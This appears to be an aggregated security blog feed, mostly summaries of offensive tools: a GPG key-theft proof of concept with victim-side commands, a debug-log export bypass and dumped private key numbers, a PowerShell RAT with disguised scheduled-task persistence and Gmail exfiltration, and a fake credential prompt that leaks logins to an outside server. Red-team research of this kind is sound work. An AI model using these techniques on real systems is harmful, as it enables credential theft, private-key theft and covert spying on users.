[powershell]Creating access request on Tufin using REST API

This script uses a user filled in excel sheet (xlsx), the sheet contains 3 columns, source, destination and service. Since Tufin SecureChange cannot do remove or deny, asking user to choose remove or deny is meaningless. the below script has tested working, but a lot of exception handling and error handling has not been in … Continue reading “[powershell]Creating access request on Tufin using REST API"

Link: http://cyruslab.net/2018/04/25/powershellcreating-access-request-on-tufin-using-rest-api/

GPG Reaper – Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory

Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memoryThis POC demonstrates method for obtaining GPG private keys from gpg-agent memory under Windows.Normally this should be possible only within 10 minutes time frame (–default-cache-ttl value).Unfortunately housekeeping() function (which is responsible for cache cleanup) is executed only if you are using GPG (there is no timer there).This means that in normal GPG usecase like: you sign some file then close GUI and do other task you password is still in gpg-agent memory (even if ttl expired).Attacker, who has access to your current session, can use this for stealing private key without knowing your passphrase.Installationpip install PGPyIf you got:TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases` when running python script then:then:pip install six==1.10.0Test1. Install Gpg4Win 3.0.32. Open command line and start agent with 2 seconds cache time:cd c:\Program Files (x86)\GnuPG\bintaskkill /im gpg-agent.exe /Fgpg-agent.exe –daemon –default-cache-ttl 23. Run Kleopatra and generate new key pair4. Sign some example test file5. Pinetry will popup and ask you for passphrase6. Repeat step 4-5. Each time pinetry shows up because our 2 seconds cache expired7. Run GPG reaperpowershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txtYou will see something like:[+] Detect GPG version 3.0.3[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85[*] Readed housekeeping bytes: 55[+] Find sec key[+] Check key grip:[*] uid [ultimate] Adam Nowak [+] Found public key[*] Allocate memory at: 2d00000[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt[+] Key dumped[*] Kill background Job[*] Restore bytesAs you can see we dump key. This is possible because we nopped the housekeeping function.8. Restore private key:python gpg_reaper.py .\testme.txtPrivate key is dumped to the file:[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 – Adam Nowak <anowak@example.com>IntroductionGPG-Agent is a daemon to manage private keys independently from any protocol.GUI interface communicates with agent using Assuan Protocol.By default agent caches your credentials.–default-cache-ttl n option set the time a cache entry is valid to n seconds.The default is 600 seconds. Each time a cache entry is accessed, its timer is reseted.Under Windows sign process looks like this:Crucial part here is housekeeping() function which is responsible for removing expired credentials from the memory.But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache).This means that cached credentials are NOT removed from the memory until some gpg-agent commands which uses agent_put_cache or agent_get_cache or agent_flush_cache are executed.UsageOn victim computer:powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txtTransfer out.txt to your machine and restore private keys:gpg_reaper.py out.txtPrivate keys will be dumped into separate files.If GPG is installed outside default directories:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeIf you don’t want debug messages:Gpg-Reaper -Verbose $falsePost exploitation on machine with GPGLet’s assume that you are doing penetration testing and you obtain shell on computer with GPG installed.If you are lucky and user use GPG recently and cache not expire you can:1. Sign some file:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet list of keys available on specific machineKEYINFO –listS KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D – – – P – – -Set keygrip and message hashSIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2# SHA512 of the messageSETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bfPKSIGN2. Export private key:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet wrapping keyKEYWRAP_KEY –exportExport a secret key from the key store. The key will be encrypted using the current session’s key wrapping key using the AESWRAP-128 algorithmEXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2Unfortunately this is not working as expected and ask for password.Why? Because cmd_export_key() function is executing agent_key_from_file() with CACHE_MODE_IGNORE flag which means that cache won’t be used and user is asked for passphrase each time.Bypass private key export restrictionWe know that it’s not possible to export GPG key through gpg-agent without knowing password.But there is little quirk here. Agent has few options available:1. –debug-levelSelect the debug level for investigating problems. level may be a numeric value or a keyword:guru – All of the debug messages you can get.2. –log-file fileAppend all logging output to file. This is very helpful in seeing what the agent actually does.Let’s run agent using gpg-agent.exe –daemon –debug-level guru –log-file out.txt and sign some file.2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE42018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<nowak@adam.xxx>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) …2018-03-04 18:21:15 gpg-agent[7180] DBG: … miss2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty – -2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) requested ttl=02018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key2018-03-04 18:21:18 gpg-agent[7180] DBG: (rsa2018-03-04 18:21:18 gpg-agent[7180] DBG: (n #00EBF36EC96D941D126938C8BD7471F4BA4FF456A3034AD4EEBABABA3A6DE52445A2A67A4FB3DF8B90C6FD65D4B648D62749905DA1CEA7ECB8C31F7DC7ECF3B581668BA3041E6AD57DBE04D75E4C74612B310704B107AB49EE731FB991A7EE0B42E9BD4CD2FF09A2C5EC0AB13B4F53287706432BD03EFD5EA5AAC194CEF188018AAD3E394F14C587BB9A829E21EC39132652CED22B561EDB34E0E4FA64FD2E6035E035EA2592C2C89E71AD2B7A3B4BBFC14288D5448D6F7A64B37AB5AA80E5D34D03F9FC6375882D298DDBCB95F192C669DB141AA2B5F29F2DFC3B12DCB7385492C3EAD8F675901B78C69238A60E76163ED1130D9B4054A9A90AB8DA148280351F#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (e #010001#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (d #4B873C9EF0DB392524167FB7999742CA02FF095E9C16AFAB8D8D69407BDE1E2AC64279239B46032480762BCB17E09FE0AA9D3243B1E5B21280AF4B719C6974DFEBA5E63452D24AEDB9CE4DEC8B17B3E502082799CD8528A0D22C45181983CB0A0BCD4352C53DDDE3724807EC9EDB5538288286FB5DB6783E1AB765BD8AB6491B7021D17AEDD7494F902121C4B2C3BDB1447C0AABADD00FBD66EEC23882F9FC13DC967E6F1F5ABBAD9FA7E583360A31D3DAEC53CB46F981398CAAD511179E11B5BA04BDB79699AA58687287E9ABA9A820B22872C54078411A142AEA804497581AAD96FCBE4F01202AA4E687672973D26E7148AB7A269B60C68581817B1EB31DE5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (p #00ED6EA59EE03412314BF288629568237A649FACC88C5D6E2F266A58D1CF6BA26254526F916FF7CFC6AF5B5ED0618CE00099DCFB9CB1F7C6BAD6945A8125ECD6A352E8056644A7336FFE2C203B098ED7767FD51101FD4842F1DED870DFD4D1F947D5FB7AB13E318C977AB875F86785F8B98260BB3BA1F6133D03C9296F22875E23#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (q #00FE67215C9C6FEF8C21C81A9B34AAB91FCD321D95E3641D7EFE4B89BBAD918CF94068AC89440147ED07E68EC65997568921DE740A504D2D99DDB997BE7DE09228678F544226F2D75F62447AECD7385773D9A7B0EF272B5CF4F32B4EFCB1B0B81893DE768B692D350CFB6B32A683DF773D66169A436DC233AD412FD438E366B6D5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (u #17BA591E668D2D78B1C74E5820A9FE31481232D34B6EBBC2004767512AD4835A42B0621EBE6CD4359BFD9B8DDA3DF234471C99B1CF553EBCF5019452143360FEC051024E43063913DD7A36FA1CA12C02FEAF07C4A4DA50C5286264BC38333C85371B13C704B1FA0265FA4DF17CC1E02B9E37ACA7D72AE40413CA6E5548107299#)))2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data2018-03-04 18:21:18 gpg-agent[7180] DBG: (flags pkcs1)2018-03-04 18:21:18 gpg-agent[7180] DBG: (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))It looks like guru mode prints n, e, d, p, q and u numbers to log file. Knowing this we can calculate public and private key.Internally skey value is print by gcry_log_debugsxp() when DBG_CRYPTO is set:if (DBG_CRYPTO){ gcry_log_debugsxp (“skey", s_skey); gcry_log_debugsxp ("hash", s_hash);}FAQWhy PowerShell?Because this file can be run without any external dependencies on most modern Windows systems.GPG %file% not existgpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in default location.You can try to specify custom location using:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeNo gpg-agent runninggpg-agent.exe is not running on this system so we cannot restore private key.Unknown gpg-agent version, sha256:Currently this script support only specific versionsNo cached keyThere is no cached key in memory so we cannot restore private key.AttributionScythe icon made by Freepik from www.flaticon.com.Solstice Of Suffering font by GraveTech.Download GPG Reaper

Link: http://feedproxy.google.com/~r/PentestTools/~3/FvmK-bXM-qg/gpg-reaper-obtainstealrestore-gpg.html

List of Adversary Emulation Tools

PenTestIT RSS Feed
Every once in a while, the security industry brings forth a new buzz word and introduces terminologies that sound über cool and generate lot’s of interest. One such word going around now-a-days is automated “adversary emulation“. Let’s first understand what this really means. Adversary emulation/simulation offers a method to test a network’s resilience against anRead more about List of Adversary Emulation Tools
The post List of Adversary Emulation Tools appeared first on PenTestIT.

Link: http://pentestit.com/adversary-emulation-tools-list/

Powershell-RAT – Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment.This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with.Any suggestions or ideas for this tool are welcome – just tweet me on @ManiarViralScreenshotsOn the first run of the Powershell-RAT user will get options as below:Using Hail Mary option to backdoor a Windows machine:Successfully taking screenshots of the user activity:Data exfiltrated as an email attachment using Gmail:My Windows machine do not have Python installed, what should I do? Compile PowershellRAT.py into an executable using Pyinstaller PyInstaller is available on PyPI. You can install it through pip: pip install pyinstallerSetupThrowaway Gmail email addressEnable “Allow less secure apps" by going to https://myaccount.google.com/lesssecureappsModify the $username & $password variable for your account in the Mail.ps1 Powershell fileModify $msg.From & $msg.To.Add with throwaway gmail addressHow do I use this? Press 1: This option sets the execution policy to unrestricted using Set-ExecutionPolicy Unrestricted. This is useful on administrator machine Press 2: This takes the screenshot of the current screen on the user machine using Shoot.ps1 Powershell script Press 3: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesCore Press 4: This option sends an email from the user machine using Powershell. These uses Mail.ps1 file to send screenshot as attachment to exfiltrate data Press 5: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesUA Press 6: This option deletes the screenshots from user machine to remain stealthy Press 7: This option backdoors the user machine using schtasks and sets the task name to MicrosoftAntiVirusCriticalUpdatesDF Press 8: This option performs all of the above with a single button press 8 on a keyboard. Attacker will receive an email every 5 minutes with screenshots as an email attachment. Screenshots will be deleted after 12 minutes Press 9: Exit gracefully from the program or press Control+C Questions?Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniar Download Powershell-RAT

Link: http://feedproxy.google.com/~r/PentestTools/~3/9X55SoE2jC4/powershell-rat-python-based-backdoor.html

CredsLeaker – Tool to Display A Powershell Credentials Box

This script will display a powershell credentials box that will ask the user for his credentials.The box cannot be closed (only by killing the process) will keeps checking the credentials against the DC. When validated, it will close and leak it to a web server outside.How To:Start a web server.Type your server IP and port in the ps1 script.Execute the batch file.TODO:Box title should be changed.Different windows versions has different credential boxes. Needs to be pulled from WINAPI.Download CredsLeaker

Link: http://feedproxy.google.com/~r/PentestTools/~3/leDDhFr8Onw/credsleaker-tool-to-display-powershell.html